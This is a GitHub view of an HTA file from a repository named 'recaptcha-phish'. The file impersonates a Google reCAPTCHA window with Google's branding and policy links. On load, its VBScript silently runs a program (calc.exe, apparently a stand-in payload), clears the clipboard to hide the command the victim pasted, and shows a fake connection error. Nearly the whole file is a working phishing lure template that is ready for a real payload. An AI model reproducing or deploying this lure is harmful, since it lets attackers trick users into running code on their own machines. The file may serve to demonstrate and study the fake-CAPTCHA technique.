forked from JohnHammond/recaptcha-phish
-
Notifications
You must be signed in to change notification settings - Fork 0
/
recaptcha-verify
91 lines (86 loc) · 2.59 KB
/
recaptcha-verify
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
<!DOCTYPE html>
<html>
<head>
<title>reCAPTCHA Verification</title>
<HTA:APPLICATION
APPLICATIONNAME="reCAPTCHA Verification"
BORDER="thin"
BORDERSTYLE="normal"
ICON="https://support.google.com/favicon.ico"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
WINDOWSTATE="normal"
SCROLL="no"
SCROLLFLAT="yes"
SYSMENU="yes"
/>
<style>
body {
font-family: Roboto, helvetica, arial, sans-serif;
margin: 0;
padding: 20px;
text-align: center;
color: #555;
box-sizing: border-box;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
width: 100%;
height: 100%;
}
img {
width: 200px;
margin-bottom: 20px;
}
#error {
color: red;
}
.terms {
font-size: small;
color: #555;
}
.terms a {
text-decoration: none;
}
.terms a:hover {
text-decoration: underline;
}
</style>
<script language="VBScript">
Sub Window_onLoad
Window.ResizeTo 520, 480
Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
Set objShell = CreateObject("WScript.Shell")
objShell.Run "calc.exe", 0, False
ClearClipboard
objShell.Run "timeout /T 2 /nobreak", 0, True
Call HideConnectingShowError
objShell.Run "timeout /T 1 /nobreak", 0, True
End Sub
Sub HideConnectingShowError
document.getElementById("connecting").style.display = "none"
document.getElementById("error").style.display = "block"
End Sub
Sub ClearClipboard
Dim objHTML
Set objHTML = CreateObject("htmlfile")
objHTML.parentWindow.clipboardData.setData "text", ""
Set objHTML = Nothing
End Sub
</script>
</head>
<body>
<img src="https://www.google.com/recaptcha/about/images/[email protected]" alt="reCAPTCHA Logo">
<div id="connecting" style="display:block;">
<p>Verifying reCAPTCHA, please wait...</p>
</div>
<div id="error" style="display:none;">
<p><b>Failed to connect with the reCAPTCHA server.</b><br>Try the verification steps again.</p>
</div>
<p class="terms">
<a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
<a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
</p>
</body>
</html>